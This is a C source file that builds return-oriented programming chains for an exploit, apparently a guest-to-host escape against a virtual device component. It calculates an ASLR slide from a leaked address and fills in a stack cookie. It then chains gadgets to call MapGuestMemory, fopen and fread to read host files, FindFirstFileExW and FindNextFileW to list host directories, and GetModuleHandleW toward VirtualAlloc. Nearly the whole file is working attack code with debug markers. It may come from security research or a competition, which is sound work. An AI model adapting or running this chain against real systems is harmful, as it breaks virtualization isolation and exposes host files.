#include <stdint.h>
#include <string.h>
#include <sys/types.h>

static uint64_t slide = 0;
static uint64_t stack_cookie = 0;
static uint64_t workitem_addr = 0;
static uint64_t shared_buffer = 0;

static uint8_t stack_content[0x100] = {0};

// 0x0000000180045ebd : mov rcx, qword ptr [rdx] ; mov qword ptr [rax], rcx ; ret


// Get WorkerThread struct address:

// pop xxx ; ret

// Get Device address

// -> 0x000000018000f678 : and al, 8 ; mov rax, qword ptr [rax] ; ret

// Get WorkerItem address:

// -> 0x000000018000f678 : and al, 8 ; mov rax, qword ptr [rax] ; ret

// Write to mmio_base_address from Device structure

// add rax, rcx ; ret

// mov qword ptr [rax], rcx ; ret


// [pop rcx ; ret] -> Get the WorkerThread struct in RAX
// [add rcx, 0x10 ; mov rax, rcx ; ret] * 0xC (offset_of WorkItem in WorkerThread)
// [mov rcx, qword ptr [rcx] ; mov rax, rcx ; ret] -> -> get WorkItem address in RAX
// [pop r8 ; mov dword ptr [rcx], eax ; ret] -> put 0x100 in r8 (length)
// [value 0x100]
// [pop rdx ; ret] -> put string address in rdx
// [1800BBFC8 rebased] address of "File saved to ',27h,'%s',27h,', C:\encrypt.exe hourly task will"
// [180045DB0 rebased] -> memove address

// mov rax, qword ptr [rax] ; ret -> get WorkItem address in RAX

// [pop rdx ; ret] -> put string address in rdx
// [1800BBFC8 rebased] address of "File saved to ',27h,'%s',27h,', C:\encrypt.exe hourly task will"


// 0x00000001800b6f03 : leave ; mov rax, r9 ; mov rbx, qword ptr [rsp + 8] ; ret

#define OFFSET              (0x400)
#define REBASE(addr)         ((uint64_t)(addr + slide))

uint64_t ret               = 0x000000018000ec1c;    // ret

uint64_t add_rsp_0x18      = 0x0000000180001258;    // add rsp, 0x18 ; ret
uint64_t add_rsp_0x38      = 0x00000001800b687b;    // add rsp, 0x38 ; ret
uint64_t add_rsp_0x28      = 0x00000001800483de;    // add rsp, 0x28 ; ret
uint64_t add_rsp_0x48      = 0x000000018000e07b;    // add rsp, 0x48 ; ret

uint64_t pop_rax           = 0x00000001800011fd;    // pop rax ; ret
uint64_t pop_rbx           = 0x0000000180010c5d;    // pop rbx ; ret
uint64_t pop_rcx           = 0x0000000180010b9d;    // pop rcx ; ret
uint64_t pop_rdx           = 0x0000000180010abd;    // pop rdx ; ret
uint64_t pop_rsi           = 0x000000018000366f;    // pop rsi ; ret
uint64_t pop_pop_pop       = 0x000000018001405e;    // pop rsi ; pop rbx ; pop rbp ; ret

uint64_t mov_mem_rcx_rcx   = 0x0000000180030c8b;    // mov rcx, qword ptr [rcx] ; mov rax, rcx ; ret
uint64_t add_rcx_0x10      = 0x000000018001b483;    // add rcx, 0x10 ; mov rax, rcx ; ret
uint64_t pop_r8            = 0x0000000180009068;    // pop r8 ; mov dword ptr [rcx], eax ; ret
uint64_t mov_mem_rcx_rax   = 0x0000000180007ca2;    // mov qword ptr [rcx], rax ; ret
uint64_t test_rcx_rcx      = 0x000000018005bc2d;    // test rcx, rcx ; sete al ; ret
uint64_t cmove_r9_rdx      = 0x00000001800b6fc1;    // cmove r9, rdx ; mov rax, r9 ; ret
uint64_t lea_rcx_rax_plus_2= 0x000000018002dfc1;    // lea rcx, [rax + 2] ; mov qword ptr [rdx], rcx ; ret
uint64_t sub_rcx_rax       = 0x0000000180021603;    // sub rcx, rax ; mov rax, rdx ; mov qword ptr [rdx], rcx ; ret

uint64_t mov_r8_rcx        = 0x000000018009b3f5;    // mov r8, rcx ; cmp r9, rdx ; jne 0x18009b3e6 ; mov rax, r8 ; ret
uint64_t mov_r9_r8         = 0x00000001800b7036;    // cmove r9, r8 ; mov rax, r9 ; ret
uint64_t test_rdx_rdx      = 0x00000001800a70e5;    // test rdx, rdx ; setne al ; ret

uint64_t mov_mem_rcx_rdx   = 0x0000000180013054;    // mov qword ptr [rcx], rdx ; ret


uint64_t mov_mem_rdx_rax   = 0x0000000180064f1d;    // mov qword ptr [rdx], rax ; ret
uint64_t mov_rax_mem_rax   = 0x000000018000792e;    // mov rax, qword ptr [rax] ; ret

uint64_t mov_mem_rcx_0x40_rax   = 0x0000000180061410;   // mov qword ptr [rcx + 0x40], rax ; ret
uint64_t mov_rdx_mem_rcx   = 0x0000000180099774; // mov rdx, qword ptr [rcx] ; xor eax, eax ; xchg dword ptr [rdx + 0x14], eax ; ret

// uint64_t pop_pop_pop_pop   = 0x00000001800819e2;    // pop rdi ; pop r14 ; pop r13 ; pop rdi ; pop rsi ; pop rbp ; pop rbx ; ret


void init_stack_cookie(uint64_t value)
{
    stack_cookie = value;
}

void init_workitem(uint64_t value)
{
    workitem_addr = value;
}

void init_slide(uint64_t leaked_addr)
{
    slide = leaked_addr - 0x18000EC18ull;
}

void init_ref_buffer(uint8_t *buffer, size_t size)
{
    memset(stack_content, 0, sizeof(stack_content));
    memcpy(stack_content, buffer, size); // TODO: fix buffer overflow here
}

size_t build_signal_minimal(void *buffer)
{
    int offset = OFFSET/8;
    uint64_t *rop_buffer = buffer;

    // Copy dumped stack content
    // memcpy((char*)rop_buffer+OFFSET, stack_content, sizeof(stack_content));

    // End of the stack frame
    rop_buffer[offset++] = stack_cookie;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;

    // Return address and avoid overwritting arg_0
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr;

    // Actual payload
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0xC0;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);

    // Reset the stack
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);

    // test
    // rop_buffer[offset++] = REBASE(add_rsp_0x48);

    return (offset*8);
}

uint64_t ReadFile_off   = 0x1800B6D07;
uint64_t fopen_off      = 0x1800809DC;
uint64_t fread_off      = 0x18007AEE4;
uint64_t memmove_off    = 0x180045DB0;
uint64_t errno_off      = 0x180080D94;
uint64_t MapGuestMemory_off = 0x18000D1D0;

size_t build_read_file(void *buffer, char *shared_buffer, off_t off, const char *filename, off_t paddr)
{
    int offset = OFFSET/8;
    uint64_t *rop_buffer = buffer;

    // Copy dumped stack content
    // memcpy((char*)rop_buffer+OFFSET, stack_content, sizeof(stack_content));

    // Copy filename to buffer
    strcpy(shared_buffer+off, filename);

    // End of the stack frame
    rop_buffer[offset++] = stack_cookie;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;

    // Return address and avoid overwritting arg_0
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr;

    // <DEBUG>
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC0;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    // rop_buffer[offset++] = REBASE(pop_rax);
    // rop_buffer[offset++] = 0xdeadbe00;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);
    // rop_buffer[offset++] = 0xaabbccddeeff0011;
    // </DEBUG>

    // Device::MapGuestMemory

    // -> Get the Size
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = REBASE(test_rdx_rdx);
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = 0x380000;
    rop_buffer[offset++] = REBASE(cmove_r9_rdx);

    // -> Get the Address
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0xC8;
    rop_buffer[offset++] = REBASE(pop_r8);
    rop_buffer[offset++] = paddr;

    // -> Get the configuration buffer
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = workitem_addr + 0x60;

    // -> Get the Device
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0xD0;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    
#ifndef PROD
    rop_buffer[offset++] = REBASE(ret);
#endif

    // // -> Call Device::MapGuestMemory (address is stored in workitem_addr+0x68)
    rop_buffer[offset++] = REBASE(MapGuestMemory_off);
    rop_buffer[offset++] = REBASE(add_rsp_0x28);
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = REBASE(ret);

    // <DEBUG>
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC0;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    // rop_buffer[offset++] = REBASE(pop_rax);
    // rop_buffer[offset++] = 0xdeadbe01;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);
    // rop_buffer[offset++] = 0xaabbccddeeff0011;
    // </DEBUG>

    // fopen

    // -> Get the filename
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0xC0;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    
    // -> Get the mode
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = REBASE(0x1800BE5B4); // string "rb"

    rop_buffer[offset++] = REBASE(pop_rbx);
    rop_buffer[offset++] = REBASE(ret); // string "rb"
    rop_buffer[offset++] = REBASE(pop_rsi);
    rop_buffer[offset++] = REBASE(ret); // string "rb"
    
    // rop_buffer[offset++] = REBASE(pop_r8);
    // rop_buffer[offset++] = 0x100;

    // -> Call fopen
    // rop_buffer[offset++] = REBASE(memmove_off);
#ifdef PROD
    rop_buffer[offset++] = REBASE(ret);
#endif
    rop_buffer[offset++] = REBASE(fopen_off);
    rop_buffer[offset++] = REBASE(add_rsp_0x28);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);


    // <DEBUG>
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC0;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    // rop_buffer[offset++] = REBASE(pop_rax);
    // rop_buffer[offset++] = 0xdeadbe01;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);
    // rop_buffer[offset++] = 0x4142434445464748;
    // </DEBUG>
    // rop_buffer[offset++] = REBASE(ret);

    // Debug payload to display the pointer / errno
    // rop_buffer[offset++] = REBASE(errno_off);
    // rop_buffer[offset++] = REBASE(mov_rax_mem_rax);
    // rop_buffer[offset++] = REBASE(pop_rdx);
    // rop_buffer[offset++] = workitem_addr + 0xC8;
    // rop_buffer[offset++] = REBASE(mov_mem_rdx_rax);
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC0;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    // rop_buffer[offset++] = REBASE(pop_rax);
    // rop_buffer[offset++] = workitem_addr + 0xC8;
    // rop_buffer[offset++] = REBASE(mov_rax_mem_rax);
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);
    // rop_buffer[offset++] = REBASE(pop_rax);
    // rop_buffer[offset++] = 0xdeadbeef;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_0x40_rax);
    

    // <DEBUG>
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC0;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    // rop_buffer[offset++] = REBASE(pop_rax);
    // rop_buffer[offset++] = 0xdeadbee7;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);
    // </DEBUG>

    // fread

    // -> Transfert the file from rax to r9
    rop_buffer[offset++] = REBASE(pop_rdx); // just to ensure that the next instruction will not crash
    rop_buffer[offset++] = workitem_addr + 0xC8;
    rop_buffer[offset++] = REBASE(lea_rcx_rax_plus_2);
    rop_buffer[offset++] = REBASE(pop_rax);
    rop_buffer[offset++] = 2;
    rop_buffer[offset++] = REBASE(sub_rcx_rax);

    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = REBASE(test_rdx_rdx);
    rop_buffer[offset++] = REBASE(cmove_r9_rdx);
    rop_buffer[offset++] = REBASE(mov_r8_rcx);
    rop_buffer[offset++] = REBASE(mov_r9_r8);

    // -> Put ElementCount in r8
    rop_buffer[offset++] = REBASE(pop_rcx); // just to ensure that the next instruction will not crash
    rop_buffer[offset++] = workitem_addr + 0xC8;
    rop_buffer[offset++] = REBASE(pop_r8);
    rop_buffer[offset++] = 0x1;

    // -> Put ElementSize in rdx
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = 0x380000;

    // -> Put Buffer in rcx
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC0;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);

    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0x60;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);

    // -> Call fread
    rop_buffer[offset++] = REBASE(fread_off);

    // <DEBUG>
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0xC0;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    rop_buffer[offset++] = REBASE(pop_rax);
    rop_buffer[offset++] = 0xdeadbee9;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);
    // </DEBUG>
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = 0xdeadbeef;

    // Reset the stack
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);

    return (offset*8);
}

uint64_t GetModuleHandleW_off = 0x180045BB0;
uint64_t GetProcAddress_off   = 0x180045BB6;

size_t build_virtual_alloc(void *buffer, void *shared_buffer)
{
    int offset = OFFSET/8;
    uint64_t *rop_buffer = buffer;

    strcpy((char*)shared_buffer+0x60, "VirtualAlloc");

    // Copy dumped stack content
    // memcpy((char*)rop_buffer+OFFSET, stack_content, sizeof(stack_content));

    // End of the stack frame
    rop_buffer[offset++] = stack_cookie;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;

    // Return address and avoid overwritting arg_0
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr;

    // Actual payload

    // GetModuleHandleW

    // -> Load kernel32.dll in rcx

    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = REBASE(0x1800BE6B0); // kernel32.dll

    //
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC8;
    // rop_buffer[offset++] = REBASE(pop_r8);
    // rop_buffer[offset++] = 0x100;

    // rop_buffer[offset++] = REBASE(pop_rdx);
    // rop_buffer[offset++] = REBASE(0x1800BB1B0); // .idata:00000001800BB1B0 ; HMODULE (__stdcall *GetModuleHandleW)

    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC0;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    
    // rop_buffer[offset++] = REBASE(memmove_off);

    // -> Call GetModuleHandleW
    rop_buffer[offset++] = REBASE(ret);
    rop_buffer[offset++] = REBASE(0x180045BB0);
    rop_buffer[offset++] = REBASE(add_rsp_0x28);
    rop_buffer[offset++] = 0x0;
    rop_buffer[offset++] = 0x0;
    rop_buffer[offset++] = 0x0;
    rop_buffer[offset++] = 0x0;
    rop_buffer[offset++] = 0x0;
    rop_buffer[offset++] = REBASE(ret);

    // <DEBUG>
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0xC0;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    rop_buffer[offset++] = REBASE(pop_rax);
    rop_buffer[offset++] = 0xdeadbe44;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);
    // </DEBUG>
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);

    // // -> Store result in workitem_addr + 0xC8
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC8;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);

    // // GetProcAddress

    // // -> Load VirtalAlloc string in RDX
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC0;
    // rop_buffer[offset++] = REBASE(mov_rdx_mem_rcx);
    
    // // -> Load Handle into RCX (from workitem_addr + 0xC8)
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC8;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);

    // // -> Call GetProcAddress
    // // rop_buffer[offset++] = REBASE(GetProcAddress_off);
    // rop_buffer[offset++] = REBASE(add_rsp_0x28);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);

    // // Log 
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC8;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rax); // store address
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xC0;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx); // get shared buffer
    // rop_buffer[offset++] = REBASE(pop_rax);
    // rop_buffer[offset++] = workitem_addr + 0xC8;
    // rop_buffer[offset++] = REBASE(mov_rax_mem_rax); // load address
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);

    return (offset*8);
}


size_t build_map_guest_buffer(void *buffer, uint64_t paddr)
{
    int offset = OFFSET/8;
    uint64_t *rop_buffer = buffer;

    // End of the stack frame
    rop_buffer[offset++] = stack_cookie;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;

    // Return address and avoid overwritting arg_0
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr;

    // Device::MapGuestMemory

    // -> Get the Size
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = REBASE(test_rdx_rdx);
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = 0x4000;
    rop_buffer[offset++] = REBASE(cmove_r9_rdx);

    // -> Get the Address
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0xC8;
    rop_buffer[offset++] = REBASE(pop_r8);
    rop_buffer[offset++] = paddr;

    // -> Get the configuration buffer
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = workitem_addr + 0x60;

    // -> Get the Device
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = workitem_addr + 0xD0;
    // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    
    // // -> Call Device::MapGuestMemory (address is stored in workitem_addr+0x68)
    // rop_buffer[offset++] = REBASE(MapGuestMemory_off);
    // rop_buffer[offset++] = REBASE(add_rsp_0x48);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);
    // rop_buffer[offset++] = REBASE(ret);


    return (offset*8);
}

size_t build_dir_listing(void *buffer, char *shared_buffer)
{
    int offset = OFFSET/8;
    uint64_t *rop_buffer = buffer;

    char dir[31] = {'C', 0, ':', 0, '\\', 0, 'e', 0, 'x', 0, 'p', 0, 'l', 0, 'o', 0, 'i', 0, 't', 0, 's', 0, '\\', 0, '*', 0, 0};
    // char dir[31] = {'C', 0, ':', 0, '\\', 0, 'e', 0, 'x', 0, 'p', 0, 'l', 0, 'o', 0, 'i', 0, 't', 0, 's', 0, '\\', 0, '*', 0, '.', 0, '*', 0, 0};
    // char dir[36] = {'C', 0, ':', 0, '\\', 0, 'e', 0, 'x', 0, 'p', 0, 'l', 0, 'o', 0, 'i', 0, 't', 0, 's', 0, '\\', 0, '*', 0, '.', 0, 'e', 0, 'x', 0, 'e', 0, 0, 0};
    // char dir[36] = {'C', 0, ':', 0, '\\', 0, 'e', 0, 'x', 0, 'p', 0, 'l', 0, 'o', 0, 'i', 0, 't', 0, 's', 0, '\\', 0, '*', 0, '.', 0, 't', 0, 'x', 0, 't', 0, 0, 0};
    // char dir[36] = {'C', 0, ':', 0, '\\', 0, 'e', 0, 'x', 0, 'p', 0, 'l', 0, 'o', 0, 'i', 0, 't', 0, 's', 0, '\\', 0, '*', 0, '.', 0, 'r', 0, 'a', 0, 'w', 0, 0, 0};
    // char dir[13] = {'C', 0, ':', 0, '\\', 0, '*', 0, '.', 0, '*', 0, 0};

    memcpy((char*)shared_buffer+0x60, dir, sizeof(dir));

    // End of the stack frame
    rop_buffer[offset++] = stack_cookie;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;

    // Return address and avoid overwritting arg_0
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr;

    // FindFirstFileExW

    // -> Configure fSearchOp to 0
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = REBASE(test_rdx_rdx);
    rop_buffer[offset++] = REBASE(cmove_r9_rdx);

    // -> Configure lpFindFileData to output buffer
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr+0xC0;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    rop_buffer[offset++] = REBASE(add_rcx_0x10);
    rop_buffer[offset++] = REBASE(add_rcx_0x10);
    rop_buffer[offset++] = REBASE(add_rcx_0x10);
    rop_buffer[offset++] = REBASE(add_rcx_0x10);
    rop_buffer[offset++] = REBASE(mov_r8_rcx);

    // -> Store the pointer
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr+0x60;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);

    // -> Configure fInfoLevelId
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = 0;

    // -> Configure lpFileName
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr+0xC0;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    
    // -> Call FindFirstFileExW
    rop_buffer[offset++] = REBASE(0x1800B6D3D);
    rop_buffer[offset++] = REBASE(add_rsp_0x48);
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;

    // -> Store the result
    rop_buffer[offset++] = REBASE(pop_rdx);
    rop_buffer[offset++] = workitem_addr+0xC8;
    rop_buffer[offset++] = REBASE(mov_mem_rdx_rax);

    // FindNextFileW

    for (int i = 0; i < 2; i++)
    {
        // -> Configure lpFindFileData
        rop_buffer[offset++] = REBASE(pop_rcx);
        rop_buffer[offset++] = workitem_addr+0x60;
        rop_buffer[offset++] = REBASE(mov_rdx_mem_rcx);

        // -> Configure hFindFile
        rop_buffer[offset++] = REBASE(pop_rcx);
        rop_buffer[offset++] = workitem_addr+0xC8;
        rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);

        // -> Call FindNextFileW
        rop_buffer[offset++] = REBASE(0x1800B6D43);
        rop_buffer[offset++] = REBASE(add_rsp_0x28);
        rop_buffer[offset++] = 0;
        rop_buffer[offset++] = 0;
        rop_buffer[offset++] = 0;
        rop_buffer[offset++] = 0;
        rop_buffer[offset++] = 0;
    }

    // // <DEBUG>
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0xC0;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    rop_buffer[offset++] = REBASE(pop_rax);
    rop_buffer[offset++] = 0xdeadbe00;
    rop_buffer[offset++] = REBASE(mov_mem_rcx_rax);
    // // </DEBUG>

    rop_buffer[offset++] = 0xdeadbeef;

    return (offset*8);
}


// size_t build_read_file(void *buffer)
// {
//     int offset = OFFSET/8;
//     uint64_t *rop_buffer = buffer;

//     // Copy dumped stack content
//     memcpy((char*)rop_buffer+OFFSET, stack_content, sizeof(stack_content));

//     // End of the stack frame
//     rop_buffer[offset++] = stack_cookie;
//     rop_buffer[offset++] = 0;
//     rop_buffer[offset++] = 0;

//     // Return address and avoid overwritting arg_0
//     rop_buffer[offset++] = REBASE(pop_rcx);
//     offset += 1;

//     // Actual payload

//     // Step 2: read the file
//     rop_buffer[offset++] = REBASE(pop_rdx);
//     rop_buffer[offset++] = 0;
//     rop_buffer[offset++] = REBASE(test_rcx_rcx);
//     rop_buffer[offset++] = REBASE(cmove_r9_rdx);

//     rop_buffer[offset++] = REBASE(pop_rcx);
//     rop_buffer[offset++] = workitem_addr + 0xC8; // we can write here
//     rop_buffer[offset++] = REBASE(pop_r8);
//     rop_buffer[offset++] = 0x100;

//     rop_buffer[offset++] = REBASE(pop_rdx);
//     rop_buffer[offset++] = shared_buffer;

//     rop_buffer[offset++] = REBASE(pop_rcx);
//     rop_buffer[offset++] = handle;
    
    
    
    

    
//     rop_buffer[offset++] = REBASE(ReadFile_off);

//     // Reset the stack
//     rop_buffer[offset++] = REBASE(ret);
//     rop_buffer[offset++] = REBASE(ret);

//     return (offset*8);
// }

size_t build_signal_exec_chain(void *buffer)
{
    int offset = OFFSET/8;
    uint64_t *rop_buffer = buffer;

    // End of the stack frame
    rop_buffer[offset++] = stack_cookie;
    rop_buffer[offset++] = 0;
    rop_buffer[offset++] = 0;

    // Return address and payload
    rop_buffer[offset++] = REBASE(pop_rcx);
    rop_buffer[offset++] = workitem_addr + 0xC0;
    rop_buffer[offset++] = REBASE(ret); // rop_buffer[offset++] = REBASE(mov_mem_rcx_rcx);
    rop_buffer[offset++] = REBASE(ret); // rop_buffer[offset++] = REBASE(mov_rax_mem_rcx);

    // Reset the stack
    rop_buffer[offset++] = REBASE(add_rsp_0x18);

    // rop_buffer[offset++] = REBASE(pop_rcx);
    // rop_buffer[offset++] = 0xdeadbeef;
    // rop_buffer[offset++] = REBASE(add_rsp_0x18);

    return (offset*8);
}

void build_memove_chain(void *buffer, uint64_t slide, uint64_t workitem_addr)
{
    uint64_t *rop_buffer = buffer;
    int offset = OFFSET;

    rop_buffer[offset++] = pop_rcx;
    rop_buffer[offset++] = workitem_addr;
    for (int i = 0; i < 0xC; i++)
        rop_buffer[offset++] = add_rcx_0x10;
    rop_buffer[offset++] = mov_mem_rcx_rcx;
    rop_buffer[offset++] = pop_r8;
    rop_buffer[offset++] = 0x100;
    rop_buffer[offset++] = pop_rdx;
    rop_buffer[offset++] = REBASE(0x1800BBFC8ull);  // string address
    rop_buffer[offset++] = REBASE(0x180045DB0);     // memmove address
}